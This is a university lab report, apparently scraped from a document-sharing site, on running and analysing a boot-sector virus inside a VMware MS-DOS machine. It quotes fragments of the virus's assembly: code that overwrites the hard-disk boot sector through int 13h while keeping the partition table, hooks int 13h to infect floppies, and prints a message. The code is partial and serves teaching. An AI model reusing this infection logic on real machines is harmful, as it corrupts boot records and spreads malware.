计算机病毒引导实验,东华大学计算机病毒实验一引导型病毒实验报告.doc
东华大学计算机病毒实验一引导型病毒实验报告
实验一 引导型病毒实验
1. 实验目的
通过实验,了解引导区病毒的感染对象和感染特征,重点学习引导病毒的感染机制和恢复感染染毒文件的方法,提高汇编语言的使用能力。
2. 实验内容
本实验需要完成的内容如下:
引导阶段病毒由软盘感染硬盘实验。通过触发病毒,观察病毒发作的现象
和步骤,学习病毒的感染机制;阅读和分析病毒的代码。
DOS运行时病毒由硬盘感染软盘的实现。通过触发病毒,观察病毒发作的现象和步骤,学习病毒的感染机制;阅读和分析病毒的代码。
3. 实验环境
VMWare Workstation 5.5.3
MS-DOS 7.10
4. 实验步骤与结果
第一步:
打开VMware Workstation,新建虚拟机,过程如下:
然后点next,点NEXT, 硬盘大小可自行分配,大概1G左右就ok,一直到完成为止。
第二步:
安装MYDOS
启动虚拟机电源,自动从虚拟软驱进入安装过程,一路点NEXT,AGREE到为虚拟机系统生成一块fat32的硬盘区,点击,然后reboot。
再次进入安装引导过程,一路点NEXT,AGREE到重写MBR 选yes,而后选择安装目录C:\dos71目录。在选择DOS commands only安装。并取消DOS add-on的安装复选项。然后一路点NEXT,AGREE。
选择enable umb memory
在下一个页面里选择load both cd/dvd 和 IDE/ATAPI
第三步:步骤如课本实验一
运行虚拟机,检查目前虚拟硬盘是否含有病毒。
将virus.img加入软驱,运行虚拟机:
删除虚拟软盘,通过硬盘引导
按任意键进入DOS系统
通过命令format A:/q 快速格式化软盘。
软驱中加入empty.img引导。如下:
5. 病毒代码分析
i. 传染模块主要代码及传染过程说明;
inc cx;cx此时为1,为2
mov ds:[si+offset reg_cx],cx
mov ax, 0301h;写入一个扇区
mov dx, 0080h;写入硬盘1的0面
int 13h;开始写入
jb boot_dos;不成功转到boot_dos
mov cl, 21h;准备搬移33个字
mov di, 01beh;从内存高端的03beh搬移到
mov si, 03beh;内存高端的01beh,此处正是病毒程序的驻留区
rep movsw;开始搬移
mov ax, 0301h;准备向硬盘写入一个扇区
xor bx, bx
inc cx;cx置1
int 13h;写入物理硬盘0面0道1扇区
call near ptr install;安装病毒的int 13h
mov dx, 0080h;读硬盘0head
int 13h;开始读取 //*** 读取正常的引导扇区,以备安装 病毒的int 13h 后正常启动
call near ptr install
传染过程说明:
先判断机器从哪里启动,如是从硬盘启动,直接安装病毒到int 13h,通过int 13h 感染软盘。读取软盘0面0道1扇区到病毒常驻段偏移地址为0200h,读取成功转read_succ处理,否则软驱复位。读取操作次数减1,不为0再次读取,否则退出。读取成功后,以vir_init处一个字的机器码为特征码进行比较,判断软盘是否已经染毒,如果未染毒,则进行传染。若已染毒,则退出。
若是从软盘启动,需传染硬盘。将读到的正常引导记录保存道0道2扇,写入一个扇区,再写入硬盘1的0面,写入不成功转到boot_dos,判断是否已被传染。写入成功则准备替换引导扇区,保留硬盘分区表,准备搬移33个字,从内存高端的03beh搬移到内存高端的01beh,搬移后将cx置1,写入物理硬盘0面0道1扇区。
ii. 表现模块的主要代码及现象说明;
waitstart:
loop waitstart
call clearstr //显示空字符串,抹去刚画的笑脸符
mov ax,0100h
int 16h
jz nextloop
ret
;调用10h中断将字符串打印到屏幕上
dispstr:
mov ax, cs
mov es, ax
mov ax, offset bootmessage
mov bp, ax; es:bp = 串地址
mov cx, 5; cx = 串长度
mov ax, 01301h; ah = 13, al = 01h
m
计算机病毒引导实验,东华大学计算机病毒实验一引导型病毒实验报告.doc相关推荐
- 计算机病毒引导实验,东华大学计算机病毒实验一引导型病毒实验报告
东华大学计算机病毒实验一引导型病毒实验报告 (30页) 本资源提供全文预览,点击全文预览即可全文预览,如果喜欢文档就下载吧,查找使用更方便哦! 11.90 积分 实验一 引导型病毒实验1. 实验目的 ...
- 计算机病毒引导实验,《计算机病毒》实验一:引导型病毒实验
<计算机病毒与防护技术>课程必做实验的实验报告,内涵完整程序代码.实验一:引导型病毒实验. 实验报告 题目:引导型病毒实验 姓名:王宇航 学号:09283020 实验环境:VMWare W ...
- 大学计算机实验6实验报告,东华大学计算机病毒课实验六宏病毒实验报告
<东华大学计算机病毒课实验六宏病毒实验报告>由会员分享,可在线阅读,更多相关<东华大学计算机病毒课实验六宏病毒实验报告(12页珍藏版)>请在读根文库上搜索. 1.计 算 机 病 ...
- 计算机病毒检测报告.pdf,东华大学计算机病毒课实验六宏病毒实验报告.pdf
东华大学计算机病毒课实验六宏病毒实验报告 计 算 机 病 毒 实验报告 姓 名: 学 号: 老 师: 日 期: 一. 实验目的 Word宏是指能组织到一起为独立命令使用的一系列Word指令,它能 使日 ...
- html病毒实验,计算机病毒实验手册4-5-9-10-8-v4.0.pdf
计算机病毒实验手册4-5-9-10-8-v4.0 计算机病毒与防治实验手册 许晓伟 中国海洋大学 信息科学与工程学院计算机系 2015 年9 月27 日 1 目录 第4 章 传统计算机病毒 1 4.1 ...
- 计算机病毒的关键技术,计算机病毒实验系统关键技术研究与实现
摘要: 计算机病毒原理与防范课程作为网络空间安全专业的核心课程,极具实践性,其中各种病毒与反病毒技术必须通过实践加以理解和掌握.该课程现有的实验系统存在以下两方面的问题:一方面,此类系统题目固定,题型 ...
- 计算机病毒分析与对抗————4、引导型病毒
1.硬盘结构简介 硬盘的三个基本参数(CHS): 柱面数(Cylinders:表示硬盘每一面盘片上有几条磁道,最大为1023(用10个二进制数存储) 磁头数(Header):表示磁盘总共有几个磁头,也 ...
- 计算机病毒的防治 教案,计算机病毒及防治教案
广教版,高一,信息技术必修 教学案例 一. 科目:信息技术基础:课题:计算机病毒及防治 二. 课时安排:1课时(45分钟) 三. 教材分析 本节课的教学内容选自广东教育出版社.高中课程标准实验教材信息 ...
- 计算机病毒及危害教案,计算机病毒及防治教案
广教版,高一,信息技术必修 教学案例 一. 科目:信息技术基础:课题:计算机病毒及防治 二. 课时安排:1课时(45分钟) 三. 教材分析 本节课的教学内容选自广东教育出版社.高中课程标准实验教材信息 ...
最新文章
- 狂神Spring Boot 员工管理系统 超详细完整实现教程(小白轻松上手~)
- MLOps是构建在一个谎言上的吗?
- 硅谷顶级VC:“S曲线”看四大风口,创企成功机会巨大
- 评论:苹果APP STORE面临失贞可能?
- gradle 项目运行主类报错
- python填写excel-Python读写Excel表格(简单实用)
- 一个多线程死锁案例,如何避免及解决死锁问题?
- mysql 字段存储多个值 ,判断一个值是否在其中
- java calendar_Java Calendar after()方法与示例
- 7-7 念数字 (10 分)
- WEB的发展历程、Tomcat服务器、与HTTP协议
- pat甲级什么水平_转让河北工程设计建筑行业(建筑工程)甲级资质
- 微信小程序搭建tabbar
- easyexcel解析xls文件:Convert excel format exception.You can try specifying the ‘excelType‘ yourself
- kali msfconsole命令详解以及靶机攻破实战
- 几分钟看懂什么是大数据?
- makefile 目标:依赖文件写法
- ubuntu18给当前用户安装cuda11.2 图文教程 、 配置cuDNN8.1 ——【一文读懂】
- 七年老安卓的九十月小结
- NFT这么香,到底解决了什么问题?
热门文章
- C++设计模式之适配器模式(adapter)(结构型)
- 结巴分词python安装不上怎么回事_python结巴分词
- Linux安装TTF/OTF字体
- windows 通过ssh 连接ubuntu22.04
- 整理总结 --- Swift(OpenStack) Swift数据模型
- 机器视觉(一):概述
- 互联网晚报 | 1月5日 星期三 | 雷军公布小米百万美金技术大奖;国内航线燃油附加费取消征收;北京冬奥成首个“云上奥运”...
- iOS开发(OC)——iOS原生API实现文件下载
- web程序设计笔记(六)——公告栏
- js基于GoEasy消息推送